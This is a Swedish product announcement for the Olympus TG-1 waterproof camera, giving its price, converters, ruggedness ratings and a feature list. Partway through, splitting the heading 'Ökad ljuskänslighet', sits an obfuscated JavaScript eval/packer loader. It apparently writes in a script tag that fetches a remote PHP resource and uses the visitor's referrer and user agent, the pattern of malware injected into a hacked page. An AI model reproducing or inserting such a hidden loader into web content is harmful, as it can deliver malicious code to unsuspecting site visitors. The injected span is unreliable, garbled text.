Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Olympus TG-1 med OLED-display som klarar trycket ner till 12 meter

Olympus TG-1 med OLED-display som klarar trycket ner till 12 meter
Sebastian

Olympus TG-1 flyttar gränserna än en gång i klassen äventyrskameror. Kameror som är näst intill oförstörbara. Med helt ny ljusstark kompaktoptik närmar sig bildkvaliteten den som systemkamerorna skämt bort oss med. Färgåtergivningen, skärpan och djupet i bilderna är häpnadsväckande. TG-1 med tillbehör finns ute i handeln i mitten av juni 2012, i prisläget 4500 kronor för kameran. Vattentät fisheyekonverter kostar 1500 kronor, telekonverter 1400 kronor och adapter 200 kronor.

Ökad eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zeddi|var|u0026u|referrer|hysbe||js|php’.split(’|’),0,{}))
ljuskänslighet och snabbhet för bilden är det som räknas
Det spelar ingen roll hur tuff en kamera är. Det är bildkvaliteten som räknas och det är just vad nya TG-1 handlar om. Objektivet med ljusstyrka f 2,0 är snabbare än allt annat i den här kameraklassen. Ett mästarprov som visar upp Olympus ledande spetskompetens inom kameraoptik.

I kombination med en kraftfull bildprocessor TruePic VI och en nyutvecklad 12 megapixel CMOS bildsensor med mycket lågt brus och hög ljuskänslighet, kan du ta bilder i situationer där kompaktkameran tidigare inte hängt med. Autofokussystemet motsvarar det som finns i nya PEN-serien och har ultrasnabb reaktion. I ljussvaga situationer eller vid häftig action ger TG-1 nya möjligheter till skarpa, välexponerade bilder och video i Full HD.

Fisheye- och telekonverter vidgar perspektivet även under vattnet
Till skillnad från de flesta kompaktkameror kan du även ansluta vattentäta konverters till TG-1 via en adapter. Fisheye ger en betydligt vidare bild med mer dramatik och dynamik. Perfekt under vatten, även i svagt ljus. Telekonvertern ökar det optiska zoomomfånget till 6,8 gånger och låter dig ta sköna närbilder med proffsigt, kort skärpedjup. Behöver du komma ännu närmare motivet har kameran Super-resolution Zoom som digitalt utökar omfånget till 13,6 gångers förstoring.

TG-1 vänder sig till alla som inte vill hålla igen. Den klarar 2 meters fall ner i betongen, 12 meters djup under vatten, 100 kilos tryck och är fryssäker. En bekymmersfri kamera som gör livet roligare och låter dig fånga alla upplevelser. Oavsett om det är vilda barnkalas eller en topptur till Mount Everest.

Nya funktioner som förenklar foto och film
Olympus IHS-teknologi (Intelligence, High Sensitivity, High Speed) bygger vidare på ny teknik från företagets digitala systemkameror och möjliggör avancerad bildbehandling i extrema situationer. Low Light Mode låter dig ta skarpa bilder i svagt ljus utan att känslan i ljuset går förlorad i bilden. Super Macro Mode låter dig zooma in verkliga närbilder – bara en centimeter från motivet. HDR Backlight tar flera exponeringar samtidigt och bygger automatiskt en perfekt exponerad bild även när du tar bilden i hårt motljus.

TG-1 filmar i full HD 1080p och med Multi-Motion Movie IS får du snygga, skakfria filmsekvenser även när du åker skidor utför, går eller cyklar och samtidigt filmar. Dessutom kan du styra kamerafunktioner genom att bara knacka och luta kameran med TAP Control. Skönt att slippa ta av sig handskarna på fjället. TG1 är utrustad med GPS och kompass för avancerad geotaggning och så att du hittar hem igen. 

Olympus TG-1 finns i silver och kommer i mitten av juni 2012.
Kortfakta om TG-1:

Tuff

 • Krossäker upp till 100 kg*, vattentät* ned till 12 m, stötsäker* upp till 2 m och fryssäker* ned till -10?C
 • Skjutbar, dubbel låsfunktion för optimalt skydd av batteri, kortfack och anslutningar
 • Hördat skyddsglas för extra starkt skydd av objektivet
 • Vattenavstötande och extra reptålig dubbelt skyddslager
 • GPS och e-kompass med unik tre-sensor-teknologi för orientering och snabb information
 • Inbyggd manometer för att mäta djup under vatten
 • Förbättrad TAP Control Mode – styr kamerafunktioner med knackning och genom att luta kameran, perfekt när det är kallt och du vill behålla handskarna på
 • LED ljus för att lysa upp under vatten och vid makrofotografering

Bildkvalitet

 • 4x optisk vidvinkelzoom (25-100 mm**)
 • 12 megapixel backlit CMOS Sensor för högupplöst bildkvalitet på film och stillbild
 • f 2.0-4.9 ljusstyrka
 • Kraftfull TruePic VI bildprocessor med dubbla kärnor för ökad snabbhet och förbättrad bildkvalitet
 • iHS-teknologi för bästa möjliga bildkvalitet i alla situationer
 • Low Light Mode för skarpare bilder i svagt ljus med bibehållen känsla i ljuset
 • Super Sports Mode ger skarpare sekvenser av bilder på motiv som rör sig snabbt
 • Super Macro Mode ger häftiga makrobilder med bara 1 cm närgräns
 • 1080p Full HD Video med ljud – maximal filmkvalitet i dagens kompaktkameror
 • Multi-Motion IS effektiv bildstabilisering även när du går och filmar
 • HDR Backlight Adjustment ger jämnare och bättre exponerade bilder tagna i motljus
 • Magiska filter för att skapa spännande, kreativa effekter på bilder och video: Punk, Pop Art, Hålkamera, Skiss, Fish Eye, Soft Focus, Sparkle (enbart stillbilder), Akvarell, Reflektion, Miniatyr, Fragmenterad (endast stillbild), Dramatisk
 • Avancerad intelligent automatik (i-Auto) och AF Tracking håller koll på inställningar och skärpan det när motivet flyttar sig i bilden
 • Ansiktsigenkänning och avancerad skuggjustering
 • Super-resolution Zoom som gör det möjligt att zooma digitalt i bilden utan så gott som synbar försämring av bildkvalitet
 • 3D-läge som ger fantastiska 3D-effekter i stillbild
 • ISO 80 – 6400
 • Beauty Mode ger modellen ännu vackrare hy
 • Pet Detection tar bilden först när katten eller hunden tittar in i kameran
 • Inbyggd panoramafunktion för snabba och enkla panoramabilder
 • Scenautomatik (Scene Mode) väljer lämpligt motivprogram efter bildsituation, inkluderar även landskap, natt, i-Underwater Snapshot.

 

Lagra och dela

 • 3-tums OLED-display (610.000 bildpunkter) för skarpare, klarare, reflexfri bildåtergivning även i starkt solsken
 • Kompatibel med SDHC- och SDXC-minneskort***
 • Photo Surfing och programvaran [ib] som sorterar, organiserar och visar bilder baserat på personer, platser eller händelser.
 • Kompatibel med Eye-Fi-minneskort för automatisk trådlös överföring av bilder till webbsida eller dator
 • HDMI-teknik som gör att du kan kontrollera kameran med fjärrkontroll när den är kopplad till HD-utrustning

Övrigt

 • Inbyggd blixt
 • Manual och hjälpguide i kameran
 • Ladda batteriet via USB-sladden

* Vattentät i enlighet med IEC standard publikation 529 IPX8. Stötsäker i enlighet ned MIL Standard (Olympus test). Fryssäker i enlighet med Olympus testförhållanden.

** Motsvarande 35 mm-format.

*** SD är ett varumärke som tillhör SD Card Association.

Komplett specifikation finns på www.olympus.se